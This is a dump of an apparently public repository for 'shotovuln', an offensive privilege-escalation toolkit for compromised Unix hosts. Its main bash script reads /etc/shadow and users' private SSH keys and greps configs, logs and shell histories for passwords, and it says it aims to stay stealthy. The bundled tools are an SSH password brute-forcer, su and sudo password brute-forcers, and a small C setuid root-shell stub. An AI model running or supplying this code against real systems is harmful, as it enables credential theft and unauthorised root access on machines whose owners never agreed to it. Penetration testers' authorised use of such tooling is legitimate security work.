├── README.md ├── shotovuln.sh └── tools ├── getsshpass-0.8.sh ├── su_brute1.py ├── sudo_brute1.py ├── suid.c └── tools_have_to_be_updated /README.md: -------------------------------------------------------------------------------- 1 | 2 | # shotovuln 3 | 4 | An offensive bash script which tries to find GENERIC privilege escalation or privilege-change vulnerabilities and similar issues on \*Nix systems. The tool will try to focus only on useful information. 5 | 6 | # target audience 7 | 8 | Pentesters who need accurate and useful information for privilege escalation 9 | 10 | the script follows these guidelines 11 | - non interactive shell 12 | - stealth, try not to touch drive except if needed, try to run everything in memory 13 | - do not output useless information, only valid vuln or nothing 14 | - run as low privilege user 15 | - show clear path to root if it exists 16 | - no colors, can be used outside of standard terminals 17 | - user should pipe output to file for easier reading 18 | - try to document the vuln example in comments (ie CVE-xxx CWE weakness) 19 | - requirement on the compromised box : \*nix OS, bash [+ python , pip: for bruteforce] 20 | 21 | typical usage: you get a webshell on \*nix and you want to elevate 22 | 23 | 24 | # options 25 | 26 | Usage: ./shotovuln.sh [currentpassword] [brute] [network] [nosuidaudit] [pupy] [msf] 27 | 28 | # another audit script for Linux again ? seriously ? 29 | 30 | Yes and no. We will try to be attack oriented. Alternatives to this script (lynis, upc, ...) output too much unnecessary information or information which needs to be cross-checked. These steps slow down pentesters in their attempts to escalate. The script also focuses on the cause of the vulnerability so it might find new ones. 
31 | 32 | -------------------------------------------------------------------------------- /shotovuln.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "SHOTOVULN v0.2 *0* Senseiiii show me the path to R00t *o* " 4 | # insert ASCII art =) 5 | echo "Usage: $0 [currentpassword] [brute] [network] [nosuidaudit] [pupy] [msf]"; 6 | echo "Vulnerabilities found will be output under each [x] test"; 7 | # source : github 444xxk/shotovuln 8 | 9 | # PHILOSOPHY for devs 10 | # - non interactive shell 11 | # - stealth, try not to touch drive except if needed, try to run everything in memory 12 | # - do not output useless information, only valid vuln or nothing 13 | # - run as low privilege user 14 | # - show clear path to root 15 | # - no colors, can be used outside of standard terminals 16 | # - user should pipe output to file for better read 17 | # - try to document the vuln example in comments (ie CVE-xxx CWE weakness) 18 | # requirement on the compromised box : *nix OS, bash [+ python , pip: for brute] 19 | # typical usage: you get a webshell on *nix and you want to elevate 20 | 21 | # TODO code all ideas already present in comments work and finalize it for v3 22 | # TODO need to check if "find" is the best cmd to check permissions 23 | # TODO limit find to maxdepth to avoid long scan time 24 | 25 | echo ""; 26 | echo "### 0. 
Pre work"; 27 | 28 | brute=false; 29 | network=false; 30 | suid=false; 31 | declare -a passfounds; 32 | 33 | # if root exit test 34 | 35 | # brutefroce network packets or SUID running might be noisy, so these are disabled by default 36 | if [ "$2" == "brute" ] ; then brute=true; echo "[B] brute mode"; else echo "[NB] no bruteforce" ; fi 37 | if [ "$3" == "network" ] ; then network=true; echo "[N] network allowed"; else echo "[NN] network not allowed"; fi 38 | if [ "$4" == "suidaudit" ] ; then suid=true; echo "[S] SUID binaries audit allowed"; else echo "[NS] suid testing not allowed"; fi 39 | # start a pupy RAT session to use pupy post exploit modules 40 | # start a meterptr session to use msf local exploit modules 41 | 42 | 43 | echo "[o] Saving writable folders for everyone, useful for next steps"; 44 | writabledirs=$(find / -maxdepth 5 -type d -perm /o+w ! -path "*mqueue*" 2>/dev/null); 45 | writedir=$(echo "$writabledirs" | head -n1); 46 | echo "[o] Will use as writable dir: $writedir"; 47 | 48 | tooldir="$(pwd)/tools/"; 49 | echo "[o] Tools dir is: $tooldir" 50 | 51 | currentuser=$(id); 52 | currentgroup=$(groups); 53 | echo "[o] Current user and privileges is: $currentuser and groups: $currentgroup"; 54 | 55 | if [ $network == true ]; then 56 | if [ ! -f "$writedir/.wordlist" ]; then 57 | echo "[o] Getting quality short password wordlist from web"; 58 | wget -qO "$writedir/.wordlist" "https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top220-probable.txt"; # copy into own git 59 | fi; 60 | fi; 61 | 62 | 63 | echo "[o] Getting valid users for login"; 64 | validusers=$(grep -v '/false' /etc/passwd | grep -v '/nologin' | cut -d ':' -f1); 65 | 66 | if [ $brute == true ]; then 67 | passwords="$writedir/.wordlist"; 68 | # python and pip needed on the box TODO test here 69 | if ( which python ); then pip install pexpect; pythonandpip=true; fi; 70 | fi; 71 | 72 | 73 | 74 | 75 | 76 | echo ""; 77 | echo "### 1. 
Auditing feature-like paths to go to other privileges" 78 | echo "[x] Getting SSH permissions"; 79 | if [ -f /etc/ssh/sshd_config ]; then 80 | sshperm=$(grep -niR --color permit /etc/ssh/sshd_config); 81 | fi; 82 | # echo "[debug] : $sshperm"; 83 | 84 | echo "[x] Getting allow users (if any) in SSH config" 85 | if [ -f /etc/ssh/sshd_config ]; then 86 | sshusers=$(grep -niR --color allowusers /etc/ssh/sshd_config);fi; 87 | # echo "[debug]: $sshusers"; 88 | 89 | if [ -f /etc/ssh/sshd_config ]; then 90 | sshport=$(grep Port /etc/ssh/sshd_config | cut -d ' ' -f2); 91 | fi; 92 | 93 | 94 | # sudo and su brute https://www.altsci.com/concepts/sudo-and-su-considered-harmful-sudosu-bruteforce-utility 95 | if [ ! -z "$1" ] ; then 96 | echo " ! Currentuser password provided ! "; 97 | echo "[x] Checking what you can do with sudo with this password, ie. going to root"; # example no CVE feature 98 | # TODO non interactive here 99 | 100 | # TODO idea for sudo: list programs that escalate through NOPASSWD. eg some guys think it's a good idea to nopasswd vim, nano, nmap...etc but in these cases you get root. 101 | 102 | sudo -l; 103 | elif [ $brute == true ]; then 104 | echo " ! No password provided ! 
" 105 | echo "[x] Bruteforcing the loggedin user password through SUDO with python scripts"; # example CWE weak password 106 | # TODO faster sudo bruteforcer, using python child / pexpect 107 | # python $tooldir/sudo_brute1.py < "$passwords" ; # here use a better script or smaller wordlist 108 | 109 | echo "[x] Brute forcing local users password through SU with python scripts"; # example CWE weak password 110 | # python $tooldir/su_brute1.py < $password; 111 | 112 | 113 | echo "[x] Now bruting valid users on SSH ports using ssh passcript"; # example CWE weak password 114 | # $tooldir/getsshpass-0.8.sh "$passwords"; 115 | # else exit; 116 | 117 | fi; 118 | 119 | 120 | 121 | 122 | 123 | # TODO check if dmesg allows you to privesc 124 | # echo "Do we have access to dmesg and check privesc related information ?" ie can we elevate with dmesg info ? 125 | #dmesg script; 126 | 127 | 128 | 129 | 130 | 131 | echo ""; 132 | echo "### 2. Auditing file and folders permissions for privesc" 133 | 134 | echo "[x] Simply cating /etc/shadow and /etc/shadow derivatives, ie. might be lucky"; #CVE-xxx CWE weak file folder permissions 135 | cat /etc/shadow 2>/dev/null; 136 | cat /etc/shadow.* 2>/dev/null; 137 | find / 2>/dev/null -readable -name '/*shadow*' -exec grep -n ':/' {} +; 138 | 139 | echo "[x] Checking readable default private RSA keys in home folders, ie. wrong RSA key permissions"; #CVE-xxx CWE weak file folder permissions 140 | for user in $validusers; do cat "/home/$user/.ssh/id_rsa" 2>/dev/null; done 141 | # TODO extend filename, remove currentuser key 142 | 143 | echo "[x] Root owned files in non root owned directory, ie. 
other can replace root owned files or symlink"; #example CVE-2016-1247 nginx package vuln, CWE weak file folder permissions 144 | for x in $(find /var -type f -user root 2>/dev/null -exec dirname {} + | sort -u); do (echo -n "root files in folder $x owned by " && stat -c %U "$x") | grep -v 'root'; done 145 | 146 | echo "[x] Writable directory in default PATH, ie. other can tamper PATH of scripts which run automatically"; #example CVE-xxx 147 | pathstotest=$(echo "$PATH" | tr ':' '\n'); 148 | for path in $pathstotest; do find "$path" 2>/dev/null -type d -perm /o+w -exec ls -alhd {} +; done 149 | 150 | echo "[x] Checking usual temporary folders for passwords or secrets and storing them, i.e. other can use the password to elevate or test password reuse"; # example CVE-xxx CWE info disclosure 151 | find /tmp/ 2>/dev/null -type f -size +0 -exec grep -i 'secret/|password/|' {} +; 152 | find /dev/shm 2>/dev/null -type f -size +0 -exec grep -i 'secret/|password/|' {} +; 153 | # TODO hash find in this content 154 | 155 | echo "[x] Checking crontab script protection, ie. other can write to crontab scripts" #example CVE-xxx 156 | for user in $validusers; do 157 | writablescripts=$(grep --color "$user" /etc/crontab | cut -f4 | cut -d ' ' -f1 | sort -u); 158 | for script in $writablescripts; do find $(which "$script") 2>/dev/null -perm /o+w -exec ls -alh {} +; find "$script" 2>/dev/null -perm /o+w -exec ls -alh {} +; done; 159 | done 160 | 161 | # /dev/mem device permission 162 | echo "[x] Checking /dev/mem device permissions, ie. user can elevate by reading to it, trying to extract useful information"; 163 | find /dev/mem -readable 2>/dev/null -exec ls -alh {} +; 164 | 165 | 166 | # TODO check not hardcoded /home but valid users home 167 | # check github.com/51x/LUI for users script 168 | 169 | 170 | echo ""; 171 | echo "### 3. 
Auditing SUID/SGID and SUID/SGID operations, without arguments provided"; 172 | ### https://www.pentestpartners.com/blog/exploiting-suid-executables/; 173 | echo "[x] SGID folders writable by others, ie. other can get group rights by writing to it"; #example CVE-xxx 174 | find / -type d -perm /g+s -perm /o+w -exec ls -alhd {} + 2>/dev/null; 175 | #find / -type d -perm /g+s -writable -exec ls -alhd {} + 2>/dev/null; # TODO writable by you but access to other group 176 | echo "[x] SUID folders writable by others, ie. other can get user rights by writing to it"; #example CVE-xxx 177 | find / -type d -perm /u+s -perm /o+w -exec ls -alhd {} + 2>/dev/null; 178 | #find / -type d -perm /u+s -writable -exec ls -alhd {} + 2>/dev/null; 179 | # TODO add not current user test ie ! -user $currentuser ; 180 | if [ $suid == true ] ; then 181 | # TODO be careful not to kill network with SUID 182 | # TODO echo "Test SUID conf files for error based info disclosure" 183 | # TODO code it --conf / -c / grep conf in help 184 | # example ./suidbinary -conf /etc/shadow outputs the user hashes 185 | echo "[x] Generating SUID logs ... you might receive some pop ups and error message since we are starting all SUID binaries."; 186 | mkdir -p "$writedir/.shotologs"; 187 | 188 | find / -perm /4000 2>/dev/null | sort -u > "$writedir/.suidbinaries"; 189 | while read -r suid; do 190 | echo "[debug: started $suid]"; 191 | basename=$(basename "$suid"); 192 | #sleep 6s; 193 | # TODO bugfix here the script stops at the middle of the list 194 | timeout 13s strace "$suid" 2>"$writedir"/.shotologs/"$basename".stracelog 1>/dev/null ; 195 | done < "$writedir/.suidbinaries"; 196 | 197 | # add this generic vuln , SUID root loading from writable dir :/ 198 | # https://www.exploit-db.com/exploits/41907/ 199 | echo "[x] Relative path opening in SUID binaries, ie. other can fool the SUID binary to open arbitrary files." #example CVE-xxx 200 | grep -n 'open("\.' 
"$writedir"/.shotologs/* --color; 201 | grep -n 'open(' "$writedir"/.shotologs/* | grep -v 'open("/'; 202 | echo "[x] Environment variables used in suid binaries, ie. other can inject into env, untrusted use of env variables." #example CVE-xxx 203 | grep -n --color "getenv(" "$writedir"/.shotologs/*; 204 | echo "[x] Exec used in SUID binaries, ie. other can fool SUID use of PATH, untrusted use of PATH." #example CVE-xxx 205 | grep -n --color 'execve(\.' "$writedir"/.shotologs/*; 206 | 207 | fi; 208 | 209 | 210 | 211 | 212 | echo ""; 213 | echo "### 4. Specific edge cases which enable you to change privilege" 214 | echo "[x] Apache symlink test, ie. allows other to check files and folders of other users using the shared apache account"; #example no CVE but feature 215 | find / 2>/dev/null -name "apache*.conf" -exec grep -n -i 'Options +FollowSymLinks' {} +; 216 | find / 2>/dev/null -name "httpd.conf" -exec grep -n -i 'Options +FollowSymLinks' {} +; 217 | echo "[x] Pythonpath variable issues, ie. if PATH is vulnerable and a python privilege script runs, other can inject into its PATH"; #example CVE-xxx 218 | pythonpath=$(python -c "import sys; print '\n'.join(sys.path);") 219 | for path in $pythonpath; do find "$path" 2>/dev/null -type d -perm /o+w -exec ls -alhd {} +; done 220 | echo "[x] Checking terminals permissions, ie. other can write or read from other user terminals and get their privileges"; #example CVE-xxx 221 | find /dev/pts/ 2>/dev/null -perm /o+r -exec ls -alh {} +; 222 | #find /dev/tty* 2>/dev/null -perm /o+r -exec ls -alh {} +; 223 | # echo "[x] Checking DBUS vulnerabilities [WIP]" ; # example CVE-2017-8422 (KAuth) and CVE-2017-8849 (smb4k) 224 | #TODO use python to check dbus isssues ? 225 | 226 | 227 | echo ""; 228 | echo "### 5. 
Init.d and RC scripts auditing"; 229 | ### The problem is service (init.d) strips all environment variables but TERM, PATH and LANG which is a good thing 230 | # http://www.yolinux.com/TUTORIALS/LinuxTutorialInitProcess.html 231 | # https://serverfault.com/questions/374404/service-command-and-environment-variables 232 | echo "[x] RC.local scripts pointing to vulnerable directory, ie. other can write to it and get root privilege"; # example CVE-xxx 233 | pathstoaudit=$(grep '^/' /etc/rc.local | cut -d ' ' -f1); # need better regex this suxx 234 | for path in $pathstoaudit; do 235 | find "$path" 2>/dev/null -perm /o+w -exec ls -alh {} +; 236 | find "$path" 2>/dev/null -writable -exec ls -alh {} +; 237 | done; 238 | echo "[x] Check if users can restart services"; 239 | # TODO code it 240 | echo "[x] Init.d scripts using unfiltered environment variables, ie. user can inject into it and get privilege"; #example CVE-xxx 241 | echo "[debug] need better filtering"; # need better filtering 242 | grep -R -v 'PATH=\|LANG=\|TERM=' /etc/init.d/* | grep " PATH\| LANG\| TERM" | grep -v '#' | grep -v 'export'; 243 | # TODO confirm this is exploitable , better regexp , remove commented line 244 | # race PATH inject before init.d is starting 245 | # init.d is starting early 246 | echo "[x] Usage of predictable or fixed files in a writable folder used by init.d, ie. other can race and symlink file creation"; # example CVE-xxx 247 | echo "[debug] need better filtering"; # need better filtering 248 | # TODO list all path used by init, filter writable ones 249 | # TODO better regex 250 | grep -R '/tmp' /etc/init.d/* | grep -v '#'; 251 | 252 | 253 | 254 | 255 | 256 | echo ""; 257 | echo -e "### 6. Configuration files, password disclosure and password reuse"; 258 | echo "[x] Checking readable passwords used in .conf files, ie. 
other can read and use them or try password reuse"; 259 | conffiles=$(find / -type f -readable 2>/dev/null -name "*.conf" | sort -u); 260 | for file in $conffiles; do 261 | if (grep -i "password =\|password=\|password :\|password:" "$file" | grep -E "^#" -v); then echo " ! Passwords found in $file" ; fi; 262 | done 263 | #find / 2>/dev/null -name "*.conf" -exec grep -n -i "password =\|password=\|password :\|password:" {} +; 264 | # TODO filter false positives, filter comments 265 | echo "[x] Checking writable .conf files, ie current user cannot modify them to achieve privesc" # example CWE 266 | find /etc 2>/dev/null -name "*.conf" -writable; 267 | 268 | 269 | 270 | echo ""; 271 | echo "### 7. Log file information disclosure"; 272 | echo "[x] Checking history files and harvesting info, ie. other can read password and try password reuse"; # example CWE file folder permission 273 | find / 2>/dev/null -name "*history" -exec grep -n -i "password\|pass\|\-p" {} +; 274 | # $validusers history grepping 275 | echo "[x] Checking log files for passwords, ie. other can read and try password reuse"; 276 | find / 2>/dev/null -name "*.log" -exec grep -n -i "password" {} +; 277 | 278 | 279 | 280 | echo ""; 281 | echo "### 8. Database file information disclosure"; 282 | echo "[x] Checking passwords inside local databases file" 283 | sqlitefiles=$(find / 2>/dev/null -name "*.sqlite" -readable); 284 | 285 | 286 | 287 | echo ""; 288 | echo "### X. Privesc matrix"; 289 | # we might need to create a matrix of user privs 290 | echo "[x] Creating a matrix of user privileges possibilities ..." 
291 | echo "[debug] sample : $currentuser > user2 > user9 > group1 > root(group) > root"; 292 | # BIG TODO , map the privilege , ie like user1 > user2 > user3 > root 293 | # privescpath=(user1,user2);(user2,root) 294 | -------------------------------------------------------------------------------- /tools/getsshpass-0.8.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # sshpass return values: 4 | # 0 - password OK 5 | # 3 - general runtime error 6 | # 5 - bad password 7 | # 255 - connection refused 8 | 9 | 10 | declare -r START_TIME=$(date +%s.%N) # Start time of the program 11 | 12 | function usage { 13 | echo -e "Usage: $0 [OPTIONS]" 14 | echo "OPTIONS: " 15 | echo -e " -a IP address of SSH server" 16 | echo -e " -d TCP port 1 - 65535 of SSH server" 17 | echo -e " -n slow down or speed up attack for number of seconds" 18 | echo -e " e.g. 1, 0.1, 0.0, default value is 0.1" 19 | echo -e " -p path to file with passwords" 20 | echo -e " -u path to file with usernames" 21 | echo -e " -v display version" 22 | echo -e " -h display help" 23 | } 24 | 25 | function version 26 | { 27 | echo -e "getsshpass.sh 0.8" 28 | echo -e "Copyright (C) 2016 Radovan Brezula 'brezular'" 29 | echo -e "License GPLv3+: GNU GPL version 3 or later ." 30 | echo -e "This is free software: you are free to change and redistribute it." 31 | echo -e "There is NO WARRANTY, to the extent permitted by law." 
32 | exit 33 | } 34 | 35 | function read_args { 36 | while getopts "a:d:n:p:u:hv" arg; do 37 | case "$arg" in 38 | a) ip="$OPTARG";; 39 | d) port="$OPTARG";; 40 | n) nval="$OPTARG";; 41 | p) passlist="$OPTARG" 42 | initpasslist="$passlist";; 43 | u) userlist="$OPTARG" 44 | inituserlist="$userlist";; 45 | v) version;; 46 | h) usage 47 | exit;; 48 | esac 49 | done 50 | } 51 | 52 | function check_args { 53 | pthdir="$(dirname $0)" 54 | 55 | if [ -f "$pthdir/x0x901f22result.txt" ]; then 56 | pass=$(grep -o "d: '.*'" x0x901f22result.txt | cut -d ":" -f2) 57 | echo "File '$pthdir/x0x901f22result.txt' contains saved password:$pass, nothing to do" && exit 58 | fi 59 | 60 | type -P sshpass 1>/dev/null 61 | [ "$?" -ne 0 ] && echo "Utillity 'sshpass' not found, exiting" && exit 62 | 63 | if [ -z "$ip" ]; then 64 | echo "IP address can't be empty, exiting" 65 | usage 66 | exit 67 | else 68 | echo "$ip" | grep -w "^[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}.[0-9]\{1,3\}$" 1>/dev/null 69 | [ "$?" -ne 0 ] && echo "'$ip' is not valid IP address, exiting" && usage && exit 70 | fi 71 | 72 | [ -z "$nval" ] && nval=0.1 # Use default value 0.1s if no -n is entered 73 | 74 | [ -z "$port" ] && echo "TCP port can'be empty, exiting" && usage && exit 75 | if [[ "$port" =~ ^[[:digit:]]+$ ]]; then 76 | if ( [ "$port" -gt 65535 ] || [ "$port" -eq 0 ] ); then 77 | echo "TCP port has to be in range 1 - 65535" 78 | usage 79 | exit 80 | fi 81 | else 82 | echo "TCP port must be digit, exiting" 83 | usage 84 | exit 85 | fi 86 | 87 | [ ! -f "$passlist" ] && echo "Can't find file with list of passwords, exiting" && usage && exit 88 | [ ! 
-f "$userlist" ] && echo "Can't find file with list of users, exiting" && usage && exit 89 | fullpasslist="$passlist" #Backup original passlist 90 | fulluserlist="$userlist" #Backup oroginal userlist 91 | 92 | # Check SSH connection 93 | echo -n "Checking SSH connection to '$ip': " 94 | sshpass -p admin ssh -o StrictHostKeyChecking=no -o ConnectTimeout=8 -p "$port" admin@"$ip" exit &>/dev/null; rvalssh="$?" 95 | if [ "$rvalssh" == 0 ]; then 96 | echo "*** OK ***" 97 | echo "*** Found username: 'admin' and password: 'admin' ***" > "$pthdir/x0x901f22result.txt" 98 | evaluate_result 99 | elif [ "$rvalssh" == 255 ]; then 100 | echo "*** FAIL ***" 101 | echo "*** Can't establish SSH connection to '$ip', exiting ***" && exit 102 | else 103 | echo "*** OK ***" 104 | fi 105 | 106 | # Read saved username and password from file 01xza01.txt, if file exists read saved credentials from file 107 | if [ -f "$pthdir/01xza01.txt" ]; then 108 | lastuser=$(head -1 "$pthdir/01xza01.txt" | cut -d ":" -f1) 109 | lastpass=$(head -1 "$pthdir/01xza01.txt" | cut -d ":" -f2) 110 | echo "Found file: '$pthdir/01xza01.txt' containig previously saved username: '$lastuser' and password: '$lastpass'" 111 | echo "Restoring attack using username '$lastuser' and password '$lastpass'" 112 | row1user=$(grep -wno "^$lastuser$" "$userlist"); rvaluser="$?" 113 | row1pass=$(grep -wno "^$lastpass$" "$passlist"); rvalpass="$?" 114 | 115 | if [ "$rvaluser" == 0 ]; then 116 | rowuser=$(echo "$row1user" | cut -d ":" -f1) 117 | tail -n +"$rowuser" "$userlist" > "$userlist"\.new 118 | userlist=$(echo "$userlist"\.new) 119 | fi 120 | 121 | if [ "$rvalpass" == 0 ]; then 122 | rowpass=$(echo "$row1pass" | cut -d ":" -f1) 123 | tail -n +"$rowpass" "$passlist" > "$passlist"\.new 124 | passlist=$(echo "$passlist"\.new) 125 | fi 126 | else 127 | [ ! 
-f "$pthdir/01xza01.txt" ] && echo "Warning: Can't find file containing last used username and password in directory '$pthdir', starting from beginning" 128 | fi 129 | 130 | maxusercount=$(wc -l "$fulluserlist" | cut -d " " -f1) 131 | maxpasscount=$(wc -l "$fullpasslist" | cut -d " " -f1) 132 | maxcount=$(( $maxusercount * $maxpasscount )) 133 | [ ! -f "$pthdir/01xza01.txt" ] && actualcount=1 134 | } 135 | 136 | function parallel_ssh { 137 | echo "$user":"$pass" > "$pthdir/01xza01.txt" 138 | sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"@"$ip" exit &>/dev/null; retval="$?" 139 | [ "$retval" == 0 ] && echo "*** Found username: '$user' and password: '$pass' ***" > "$pthdir/x0x901f22result.txt" 140 | # While loop eliminates 'Connection refused' attempts -> retval=255 and 'General runtime error' -> retval=3 141 | # It happens when parameter 'n' is too small 142 | # retval must be either 0 -> good password or 5 -> bad password 143 | while [ "$retval" == 255 -o "$retval" == 3 ]; do 144 | sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"@"$ip" exit &>/dev/null; retval="$?" 145 | [ "$retval" == 0 ] && echo "*** Found username: '$user' and password: '$pass' ***" > "$pthdir/x0x901f22result.txt" 146 | sleep "$nval" 147 | done 148 | } 149 | 150 | function launch_attack { 151 | while read user; do 152 | while read pass; do 153 | if [ ! 
-f "$pthdir/x0x901f22result.txt" ]; then 154 | echo "Trying username: '$user' and password: '$pass'" 155 | parallel_ssh &>/dev/null & 156 | else 157 | evaluate_result 158 | fi 159 | sleep $nval 160 | done < "$passlist" 161 | passlist="$fullpasslist" # Always start search with first pass from dictionary when user is changed 162 | done < "$userlist" 163 | evaluate_result 164 | } 165 | 166 | # Show ellapsed time 167 | function ellapsed_time { 168 | END_TIME=$(date +%s.%N) 169 | dt=$(echo "$END_TIME - $START_TIME" | bc) 170 | dd=$(echo "$dt/86400" | bc) 171 | dt2=$(echo "$dt-86400*$dd" | bc) 172 | dh=$(echo "$dt2/3600" | bc) 173 | dt3=$(echo "$dt2-3600*$dh" | bc) 174 | dm=$(echo "$dt3/60" | bc) 175 | ds=$(echo "$dt3-60*$dm" | bc | awk '{printf("%.2f\n", $1)}') 176 | 177 | if [ "$dd" == "0" ] ; then dd=""; else dd=${dd}"d "; fi 178 | if [ "$dh" == "0" ] ; then dh=""; else dh=${dh}"h "; fi 179 | if [ "$dm" == "0" ] ; then dm=""; else dm=${dm}"m "; fi 180 | 181 | echo "Ellapsed time: "${dd}""${dh}""${dm}""${ds}"s" 182 | } 183 | 184 | function evaluate_result { 185 | [ -f "$pthdir/01xza01.txt" ] && rm "$pthdir/01xza01.txt" # We don't need last saved password when script kills itself (password found) or 186 | if [ -f "$pthdir/x0x901f22result.txt" ]; then # Display found username and password when password is found 187 | cat "$pthdir/x0x901f22result.txt" 188 | ellapsed_time 189 | else 190 | echo "*** Password not found, use other dictionary ***" 191 | fi 192 | [ -f "$inituserlist".new ] && rm "$inituserlist".new # delete files $inituserlist.new and $initpasslist.new 193 | [ -f "$initpasslist".new ] && rm "$initpasslist".new # they're created when interrupted guessing is used 194 | pkill sshpass 195 | } 196 | 197 | function monitor_signal { 198 | trap 'pkill sshpass; echo "Program teminated."; exit' SIGHUP SIGTERM SIGQUIT # kill sshpass when script finishes or 199 | trap 'pkill sshpass; echo "Ctrl+C detected, start script again to continue with attack"; exit' SIGINT # it is 
interrupted / suspended 200 | trap 'pkill sshpass; echo "Ctrl+Z detected, start script again to continue with attack"; exit' SIGTSTP 201 | } 202 | 203 | 204 | ### BODY ### 205 | 206 | read_args $"@" 207 | check_args 208 | monitor_signal 209 | launch_attack 210 | -------------------------------------------------------------------------------- /tools/su_brute1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | su_brute1.py 4 | by Javantea 5 | Aug 10, 2010 6 | 7 | Su Bruteforce Utility version 0.1 8 | Allows an attacker with wheel access to gain root priviledges using a 9 | dictionary or bruteforce attack provided by pipe. 10 | For example: 11 | ./john --stdout --incremental | python su_brute1.py 12 | python su_brute1.py < rockyou1_order.txt 13 | """ 14 | 15 | import pexpect 16 | from sys import stdin 17 | 18 | password_test = '#' 19 | password_found = [] 20 | 21 | while password_test: 22 | # need to multiply child for faster brute 23 | password_test = stdin.readline().strip() 24 | # print "password tested is " + password_test # debug 25 | child = pexpect.spawn('su') 26 | child.expect('Password:') 27 | child.sendline(password_test) 28 | data = child.readline() 29 | data += child.readline() 30 | data += child.readline() 31 | failure = ('su: Authentication failure' in data) 32 | child.close() 33 | # print 'data1:', data # debug 34 | if not failure: 35 | print 'data2:', repr(data) 36 | if 'Permission denied' in data: 37 | print 'You are not in wheel, sorry.' 
38 | break 39 | #end if 40 | print "password found:", password_test 41 | break 42 | #end if 43 | #loop 44 | 45 | -------------------------------------------------------------------------------- /tools/sudo_brute1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | sudo_brute1.py 5 | by Javantea 6 | Aug 10, 2010 7 | 8 | Sudo Bruteforce Utility version 0.1 9 | Allows an attacker with wheel access to gain root priviledges using a 10 | dictionary or bruteforce attack provided by pipe. 11 | For example: 12 | ./john --stdout --incremental | python sudo_brute1.py 13 | python sudo_brute1.py < rockyou1_order.txt 14 | """ 15 | 16 | import pexpect 17 | from sys import stdin 18 | 19 | 20 | 21 | password_test3 = '#' 22 | while password_test3: 23 | print "reading from stdin" 24 | password_test1 = stdin.readline().strip() 25 | password_test2 = stdin.readline().strip() 26 | password_test3 = stdin.readline().strip() 27 | print password_test1 28 | print password_test2 29 | print password_test3 30 | child = pexpect.spawn('sudo test') 31 | print child 32 | # patch here 33 | child.expect('Password:') 34 | child.sendline(password_test1) 35 | data = child.readline() 36 | data += child.readline() 37 | failure1 = ('Sorry, try again.' in data) 38 | print 'data0a:', data 39 | child.expect('Password:') 40 | child.sendline(password_test2) 41 | data = child.readline() 42 | data += child.readline() 43 | failure2 = ('Sorry, try again.' in data) 44 | print 'data0b:', data 45 | child.expect('Password:') 46 | child.sendline(password_test3) 47 | data = child.readline() 48 | data += child.readline() 49 | failure3 = ('Sorry, try again.' in data) 50 | child.close() 51 | print 'data1:', data 52 | failure = failure1 and failure2 and failure3 53 | if not failure: 54 | print 'data2:', repr(data) 55 | if 'Permission denied' in data: 56 | print 'You are not in sudoers, sorry.' 
57 | break 58 | #end if 59 | print "password found:", password_test1, password_test2, password_test3 60 | break 61 | #end if 62 | #loop 63 | 64 | -------------------------------------------------------------------------------- /tools/suid.c: -------------------------------------------------------------------------------- 1 | int main(void){ 2 | setresuid(0, 0, 0); 3 | system("/bin/sh"); 4 | } 5 | -------------------------------------------------------------------------------- /tools/tools_have_to_be_updated: -------------------------------------------------------------------------------- 1 | yes 2 | --------------------------------------------------------------------------------